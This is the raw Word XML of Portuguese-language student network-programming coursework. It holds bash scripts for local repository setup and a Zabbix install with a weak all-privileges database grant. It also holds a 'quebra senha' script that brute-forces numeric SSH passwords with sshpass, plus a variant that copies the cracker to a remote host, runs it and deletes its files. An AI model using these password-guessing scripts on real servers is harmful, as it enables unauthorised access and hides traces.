    <w:p w:rsidR="00253F9B" w:rsidRPr="006E2401" w:rsidRDefault="00253F9B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t>No navegador do cliente:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00253F9B" w:rsidRDefault="00253F9B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 xml:space="preserve">[ip do proxy]/srg_reports </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6121" w:rsidRDefault="00EE6121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E6121" w:rsidRDefault="00EE6121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firewall</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6121" w:rsidRDefault="00EE6121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endian </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6121" w:rsidRDefault="00EE6121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ufw</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6121" w:rsidRDefault="00EE6121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brasilufw</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00554414" w:rsidRPr="006E2401" w:rsidRDefault="00554414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pcop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD023A" w:rsidRPr="006E2401" w:rsidRDefault="00DD023A" w:rsidP="006E2401">
      <w:pPr>
        <w:spacing w:after="12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E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD023A" w:rsidRDefault="00E4526C" w:rsidP="006E2401">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:spacing w:line="360" w:lineRule="auto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t>PROGRAMAÇÃO PARA REDES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F5129A" w:rsidRPr="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00946841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F53AAC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SCRIPT QUEBRA SENHA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (serv. A - B)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC">
      <w:r>
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC"/>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC">
      <w:r>
        <w:t># Scrip para encontrar a senha de um servidor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC">
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC">
      <w:r>
        <w:t># Criado por Tiffany Panegalli &amp; Igor Jambeiro</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC">
      <w:r>
        <w:t># Turma: R3M</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC">
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC">
      <w:r>
        <w:t>#########################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC"/>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC">
      <w:r>
        <w:t># Comando para acessar um servidor através do ssh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC">
      <w:r>
        <w:t>clear</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC">
      <w:r>
        <w:t>echo "Bem-vindo ao script \"quebra senha\""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC">
      <w:r>
        <w:t>echo "Digite o nome de usuário"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC">
      <w:r>
        <w:t>read USER</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC">
      <w:r>
        <w:t>echo "Digite o IP da rede que deseja acessar"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC">
      <w:r>
        <w:t>read IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC"/>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC">
      <w:r>
        <w:t>#Comando para descobrir a senha do usuário</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC">
      <w:r>
        <w:t>PASSWORD=489    #Atribuindo um valor à variável PASSWORD, para fins de testes (para teste efitivo: PASSWORD=999)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC"/>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC">
      <w:r>
        <w:t>while [ $PASSWORD -le 999 ]     #O programa ficará em andamento enquanto a senha for menor que 999. Logo, o Loop só irá parar quando a senha do usuário for encontrada</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC">
      <w:r>
        <w:t>do</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC">
      <w:r>
        <w:t xml:space="preserve">        PASSWORD=$((PASSWORD-1))        #A variável PASSWORD será decrementada até que se encontre a senha correta</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC">
      <w:r>
        <w:t xml:space="preserve">        echo $PASSWORD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC">
      <w:r>
        <w:t xml:space="preserve">        echo "$PASSWORD" &gt; ~/senha_encontrada   #Comando para redirecionar o valor da variável PASSWORD para o arquivo /home/senha_encontrada</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC">
      <w:r>
        <w:t xml:space="preserve">        clear</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC">
      <w:r>
        <w:t xml:space="preserve">        sshpass -p "$PASSWORD" scp /etc/network/interfaces $USER@$IP:/dev/null &amp;&amp;  break        #Comando para cópia remota via ssh. Neste caso será copiado o arquivo /etc/network/interfaces para o arquivo /dev/null, que é um arquivo padrão do debian para testes, onde tudo que é gravado é excluído automaticamente</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC"/>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC">
      <w:r>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC">
      <w:r>
        <w:t>clear</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC">
      <w:r>
        <w:t xml:space="preserve">        echo "Senha Encontrada: acessar cat ~/senha_encontrada!!!"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC">
      <w:r>
        <w:t xml:space="preserve">        cat ~/senha_encontrada</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="00F53AAC">
      <w:pPr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F53AAC" w:rsidRPr="00F53AAC" w:rsidRDefault="00F53AAC" w:rsidP="006C04DD">
      <w:pPr>
        <w:pStyle w:val="Ttulo1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F53AAC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SCRIPT QUEBRA SENHA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (serv. A - B - C)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E">
      <w:r>
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E">
      <w:r>
        <w:t>#Programador: Tiffany Panegalli</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E">
      <w:r>
        <w:t>#Turma: R3M</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E">
      <w:r>
        <w:t>############################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E">
      <w:r>
        <w:t>#Comando para acessar um servidor através do ssh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E"/>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E">
      <w:r>
        <w:t>clear</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E">
      <w:r>
        <w:t>echo "Bem-vindo ao scrip \"quebra senha\" "</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E">
      <w:r>
        <w:t>echo "Digite o nome do usuário:"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E">
      <w:r>
        <w:t>read USER</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E">
      <w:r>
        <w:t>echo "Digite a senha do usuário:"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E">
      <w:r>
        <w:t>read PASSWORD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E">
      <w:r>
        <w:t>echo "Digite o IP da rede que deseja acessar:"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E">
      <w:r>
        <w:t>read IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E"/>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E">
      <w:r>
        <w:t>#Comandos para acessar o servidor através do ssh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E">
      <w:r>
        <w:t>sshpass -p "$PASSWORD" scp quebra_senha.sh $USER@$IP:/home/$USER</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E">
      <w:r>
        <w:t>clear</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E">
      <w:r>
        <w:t>sshpass -p "$PASSWORD" ssh $USER@$IP './quebra_senha.sh'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E">
      <w:r>
        <w:t>sshpass -p "$PASSWORD" scp $USER@$IP:~/senha_encontrada .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E"/>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E">
      <w:r>
        <w:t>#Comandos para remover os arquivos criados em outro servidor e exibí-los na máquina local</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E">
      <w:r>
        <w:t>sshpass -p "$PASSWORD" ssh $USER@$IP 'rm ~/quebra_senha.sh'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E">
      <w:r>
        <w:t>sshpass -p "$PASSWORD" ssh $USER@$IP 'rm ~/senha_encontrada'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E">
      <w:r>
        <w:t>clear</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E">
      <w:r>
        <w:t>echo "senha encontrada!!!"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E">
      <w:r>
        <w:t>echo "o arquivo senha_encontrada foi copiado para o seu diretório local:"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53AAC" w:rsidRDefault="00811A8E" w:rsidP="00811A8E">
      <w:r>
        <w:t>cat senha_encontrada</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E">
      <w:pPr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811A8E" w:rsidRDefault="00811A8E" w:rsidP="006C04DD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F53AAC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SCRIPT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PARA CONFIGURAÇÃO DE REPOSITÓRIO LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1576" w:rsidRPr="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576">
      <w:r w:rsidRPr="009F1576">
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1576" w:rsidRPr="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576"/>
    <w:p w:rsidR="009F1576" w:rsidRPr="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576">
      <w:r w:rsidRPr="009F1576">
        <w:t>#Script para criação de repositorio no debian 9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1576" w:rsidRPr="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576">
      <w:r w:rsidRPr="009F1576">
        <w:t>#Criado por: Tiffany Panegalli</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1576" w:rsidRPr="009F1576" w:rsidRDefault="00BB0FE5" w:rsidP="009F1576">
      <w:r>
        <w:t>#1 semestre de 2018</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1576" w:rsidRPr="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576">
      <w:r w:rsidRPr="009F1576">
        <w:t>clear</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1576" w:rsidRPr="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576">
      <w:r w:rsidRPr="009F1576">
        <w:t>echo "Bem-vindo ao script para criação de repositório local"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1576" w:rsidRPr="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576">
      <w:r w:rsidRPr="009F1576">
        <w:t>echo "digite o IP da rede onde estão os repositórios:"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1576" w:rsidRPr="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576">
      <w:r w:rsidRPr="009F1576">
        <w:t>read IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576"/>
    <w:p w:rsidR="00BB0FE5" w:rsidRPr="009F1576" w:rsidRDefault="00BB0FE5" w:rsidP="009F1576">
      <w:r>
        <w:t>#mostrar pontos de montagem no ip determinado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1576" w:rsidRPr="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576">
      <w:r w:rsidRPr="009F1576">
        <w:t>showmount -e $IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1576" w:rsidRPr="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576">
      <w:r w:rsidRPr="009F1576">
        <w:t>echo "São esses os repositórios que você procura?(y/n)"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1576" w:rsidRPr="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576">
      <w:r w:rsidRPr="009F1576">
        <w:t>read RESP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1576" w:rsidRPr="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576"/>
    <w:p w:rsidR="009F1576" w:rsidRPr="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576">
      <w:r w:rsidRPr="009F1576">
        <w:t>if [ "$RESP" = "y" ]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1576" w:rsidRPr="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576">
      <w:r w:rsidRPr="009F1576">
        <w:t>then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576">
      <w:r w:rsidRPr="009F1576">
        <w:t xml:space="preserve">        mkdir /mnt/repo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB0FE5" w:rsidRPr="009F1576" w:rsidRDefault="00BB0FE5" w:rsidP="009F1576">
      <w:r>
        <w:t>#comando para montagem de repositório</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1576" w:rsidRPr="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576">
      <w:r w:rsidRPr="009F1576">
        <w:t xml:space="preserve">        mount -t nfs -o nfsvers=3 $IP:/home/celso/FTP/Linux/debian93 /mnt/repo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1576" w:rsidRPr="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576">
      <w:r w:rsidRPr="009F1576">
        <w:t xml:space="preserve">        mkdir /mnt/share</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1576" w:rsidRPr="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576">
      <w:r w:rsidRPr="009F1576">
        <w:t xml:space="preserve">        mkdir /mnt/share/blu1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1576" w:rsidRPr="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576">
      <w:r w:rsidRPr="009F1576">
        <w:t xml:space="preserve">        mkdir /mnt/share/blu2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1576" w:rsidRPr="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576">
      <w:r w:rsidRPr="009F1576">
        <w:t xml:space="preserve">        mkdir /mnt/share/blu3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1576" w:rsidRPr="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576">
      <w:r w:rsidRPr="009F1576">
        <w:t xml:space="preserve">        echo "listando conteúdo do diretório /mnt/repo..."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576">
      <w:r w:rsidRPr="009F1576">
        <w:t xml:space="preserve">        ls -l /mnt/repo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB0FE5" w:rsidRPr="009F1576" w:rsidRDefault="00BB0FE5" w:rsidP="009F1576">
      <w:r>
        <w:t>#Configuração do sources.list para funcionar pelo repositório local</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1576" w:rsidRPr="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576">
      <w:r w:rsidRPr="009F1576">
        <w:t xml:space="preserve">        seq 3 | xargs -I@ mount -t iso9660 -o loop,ro /mnt/repo/debian-9.3.0-amd64-BD-@.iso /mnt/share/blu@</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1576" w:rsidRPr="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576">
      <w:r w:rsidRPr="009F1576">
        <w:t xml:space="preserve">        seq 3 | xargs -I@ echo deb [trusted=yes] file:/mnt/share/blu@ stretch main contrib &gt; /etc/apt/sources.list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1576" w:rsidRPr="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576">
      <w:r w:rsidRPr="009F1576">
        <w:t xml:space="preserve">        apt update</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1576" w:rsidRPr="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576">
      <w:r w:rsidRPr="009F1576">
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1576" w:rsidRPr="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576">
      <w:r w:rsidRPr="009F1576">
        <w:t>echo "IP inválido"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1576" w:rsidRPr="009F1576" w:rsidRDefault="009F1576" w:rsidP="009F1576">
      <w:r w:rsidRPr="009F1576">
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811A8E" w:rsidRDefault="00811A8E" w:rsidP="00811A8E">
      <w:pPr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BB0FE5" w:rsidRDefault="00BB0FE5" w:rsidP="006C04DD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F53AAC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SCRIPT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PARA INSTALAÇÃO DO ZABBIX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB0FE5" w:rsidRDefault="00BB0FE5" w:rsidP="00BB0FE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF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#!/bin/bash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#############################################################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#                  Instalação Zabbix-3.4.7                  #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#                 Debian 9.3 GNU/Linux 2018                 #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#############################################################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clear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printf "\n\033[41;1;38mInstalação Zabbix 2017\033[0;0m\n\n"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8251A" w:rsidRPr="00B46D42" w:rsidRDefault="00113788" w:rsidP="00B8251A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D53B5" wp14:editId="08812B16">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3276600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>290195</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1562100" cy="24765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Default="00376B85">
                            <w:r>
                              <w:t>saída padrão de e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53B5" id="Caixa de texto 6" o:spid="_x0000_s1033" type="#_x0000_t202" style="position:absolute;margin-left:258pt;margin-top:22.85pt;width:123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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00376B85" w:rsidRDefault="00376B85">
                      <w:r>
                        <w:t>saída padrão de er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EA6C9" wp14:editId="703144E8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2362199</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>185419</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="771525" cy="200025"/>
                <wp:effectExtent l="38100" t="57150" r="28575" b="2857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FA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86pt;margin-top:14.6pt;width:60.75pt;height:15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B8251A" w:rsidRPr="00B46D42">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>apt-get update &gt; /dev/null 2&gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8251A" w:rsidRPr="00B46D42" w:rsidRDefault="00113788" w:rsidP="00B8251A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B7904" wp14:editId="6D8E52DC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>219075</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>177165</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="219075" cy="400050"/>
                <wp:effectExtent l="0" t="38100" r="4762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D442" id="Conector de seta reta 8" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:17.25pt;margin-top:13.95pt;width:17.25pt;height:3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8251A" w:rsidRPr="00B46D42">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>if [ $? != 0 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8251A" w:rsidRPr="00B46D42" w:rsidRDefault="00113788" w:rsidP="00B8251A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C31B6" wp14:editId="5C7BB74E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057900" cy="2476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85" w:rsidRDefault="00376B85" w:rsidP="00113788">
                            <w:r>
                              <w:t>variável para ver se o comando anterior deu certo ou ñ (n=0=ok; n=!0=ñ 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31B6" id="Caixa de texto 10" o:spid="_x0000_s1034" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:32.25pt;width:477pt;height:19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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00376B85" w:rsidRDefault="00376B85" w:rsidP="00113788">
                      <w:r>
                        <w:t>variável para ver se o comando anterior deu certo ou ñ (n=0=ok; n=!0=ñ O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51A" w:rsidRPr="00B46D42">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        printf "\n\033[31mFalha na atualização do repositório Debian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printf "\n\033[44;1;38m1. Instalado dependências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apt install build-essential snmp vim libssh2-1-dev libssh2-1 libopenipmi-dev libevent* libpcre* -y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printf "\n\033[31mFalha na Instalação de alguns pacotes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apt install libsnmp-dev wget libcurl4-gnutls-dev fping libxml2 libxml2-dev curl libcurl3-gnutls -y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printf "\n\033[31mFalha na Instalação de alguns pacotes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apt install libcurl3-gnutls-dev libiksemel-dev libiksemel-utils libiksemel3 -y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printf "\n\033[31mFalha na Instalação de alguns pacotes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apt install apache2 php7.0 php7.0-mysql libapache2-mod-php7.0 php7.0-gd libpq5 libpq-dev mysql-server mysql-client libmariadbd-dev -y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printf "\n\033[31mFalha na Instalação de alguns pacotes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apt install php-bcmath php-mbstring php-ldap php-xml php-xmlreader php-xmlwriter -y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printf "\n\033[31mFalha na Instalação de alguns pacotes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printf "\n\033[44;1;38m2. Criando o banco de dados no MariaDB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mysql -u root -e "create database zabbix character set utf8;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mysql -u root -e "GRANT ALL PRIVILEGES ON *.* TO zabbix@localhost IDENTIFIED BY 'zabbix' WITH GRANT 